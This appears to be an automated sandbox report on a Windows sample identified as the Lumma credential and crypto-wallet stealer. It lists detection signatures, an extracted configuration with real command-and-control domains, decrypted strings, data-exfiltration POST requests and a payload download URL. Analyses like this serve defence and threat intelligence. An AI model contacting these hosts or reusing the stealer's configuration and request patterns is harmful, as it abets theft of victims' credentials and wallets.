Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1543216
MD5:5c0022dd6f83870f6a81faf362383ae3
SHA1:a34e622e2bafbbbc107bb7311681516126838e90
SHA256:1df402c5bd54c8b600ba43b0c94ff494786617d2276aec771af24202b310ac63
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5C0022DD6F83870F6A81FAF362383AE3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["thumbystriw.store", "navygenerayk.store", "presticitpo.store", "necklacedmny.store", "founpiuer.store", "fadehairucw.store", "crisiwarny.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1711943208.00000000006DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: file.exe PID: 7472JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: file.exe PID: 7472JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-27T13:03:01.697402+010020546531A Network Trojan was detected192.168.2.449730172.67.170.64443TCP
            2024-10-27T13:03:02.892163+010020546531A Network Trojan was detected192.168.2.449731172.67.170.64443TCP
            2024-10-27T13:03:39.473628+010020546531A Network Trojan was detected192.168.2.449701172.67.170.64443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-27T13:03:01.697402+010020498361A Network Trojan was detected192.168.2.449730172.67.170.64443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-27T13:03:02.892163+010020498121A Network Trojan was detected192.168.2.449731172.67.170.64443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-27T13:03:40.380479+010020197142Potentially Bad Traffic192.168.2.449702185.215.113.1680TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-27T13:03:09.964365+010020480941Malware Command and Control Activity Detected192.168.2.449735172.67.170.64443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: file.exeAvira: detected
            Found malware configuration
            Source: file.exe.7472.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["thumbystriw.store", "navygenerayk.store", "presticitpo.store", "necklacedmny.store", "founpiuer.store", "fadehairucw.store", "crisiwarny.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: file.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString decryptor: scriptyprefej.store
            Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString decryptor: navygenerayk.store
            Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString decryptor: founpiuer.store
            Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacedmny.store
            Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString decryptor: thumbystriw.store
            Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString decryptor: fadehairucw.store
            Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString decryptor: crisiwarny.store
            Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
            Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
            Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49701 version: TLS 1.2
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\3D ObjectsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.170.64:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.170.64:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.170.64:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.170.64:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 172.67.170.64:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49701 -> 172.67.170.64:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: thumbystriw.store
            Source: Malware configuration extractorURLs: navygenerayk.store
            Source: Malware configuration extractorURLs: presticitpo.store
            Source: Malware configuration extractorURLs: necklacedmny.store
            Source: Malware configuration extractorURLs: founpiuer.store
            Source: Malware configuration extractorURLs: fadehairucw.store
            Source: Malware configuration extractorURLs: crisiwarny.store
            Source: Malware configuration extractorURLs: scriptyprefej.store
            Source: Joe Sandbox ViewIP Address: 172.67.170.64 172.67.170.64
            Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49702 -> 185.215.113.16:80
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: crisiwarny.store
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18168Host: crisiwarny.store
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8789Host: crisiwarny.store
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20442Host: crisiwarny.store
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1271Host: crisiwarny.store
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568249Host: crisiwarny.store
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: crisiwarny.store
            Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
            Source: global trafficDNS traffic detected: DNS query: presticitpo.store
            Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
            Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
            Source: file.exe, 00000000.00000003.2086064735.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086762508.00000000006C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
            Source: file.exe, 00000000.00000003.2086064735.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086762508.00000000006C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Q=
            Source: file.exe, 00000000.00000002.2086588158.0000000000672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086360372.000000000019A000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086064735.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086762508.00000000006C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
            Source: file.exe, 00000000.00000002.2086588158.0000000000672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeS
            Source: file.exe, 00000000.00000002.2086588158.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16:80/off/def.exe
            Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: file.exe, 00000000.00000003.1741732815.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1793344937.000000000510C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086762508.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2089716142.000000000510C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085807683.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1711799765.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1711943208.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/
            Source: file.exe, 00000000.00000002.2089716142.000000000510C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/0
            Source: file.exe, 00000000.00000003.1793344937.000000000510C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/H
            Source: file.exe, 00000000.00000003.1711799765.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1711943208.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/J
            Source: file.exe, file.exe, 00000000.00000002.2086588158.0000000000689000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064631694.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1793004274.0000000005102000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1711799765.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/api
            Source: file.exe, 00000000.00000003.1793004274.0000000005102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/api9
            Source: file.exe, 00000000.00000003.1793207907.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064513836.0000000000700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/apibu
            Source: file.exe, 00000000.00000002.2086588158.0000000000672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/apig
            Source: file.exe, 00000000.00000003.1759143782.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1786059361.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759468384.00000000006FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/bfa
            Source: file.exe, 00000000.00000003.2064902373.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064714160.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/g
            Source: file.exe, 00000000.00000003.2064902373.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064714160.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/s://crisiwarny.store/apit
            Source: file.exe, 00000000.00000003.1756778602.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1741732815.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742430669.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/u
            Source: file.exe, 00000000.00000003.1793207907.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064513836.0000000000700000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759143782.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1786059361.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759468384.00000000006FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/v8hs
            Source: file.exe, 00000000.00000003.1793344937.000000000510C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/x
            Source: file.exe, 00000000.00000002.2086588158.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store:443/api
            Source: file.exe, 00000000.00000002.2086588158.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store:443/apitxtPK
            Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: file.exe, file.exe, 00000000.00000003.1759077269.0000000000709000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1756778602.0000000000704000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
            Source: file.exe, 00000000.00000002.2086588158.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://presticitpo.store:443/api
            Source: file.exe, 00000000.00000003.1712165908.0000000005150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: file.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: file.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: file.exe, 00000000.00000003.1712232842.0000000005147000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1712165908.000000000514E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: file.exe, 00000000.00000003.1712232842.0000000005122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: file.exe, 00000000.00000003.1712232842.0000000005147000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1712165908.000000000514E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: file.exe, 00000000.00000003.1712232842.0000000005122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: file.exeString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C
            Source: file.exe, 00000000.00000003.1759077269.0000000000709000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1756778602.0000000000704000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: file.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: file.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: file.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: file.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: file.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.4:49732 version: TLS 1.2
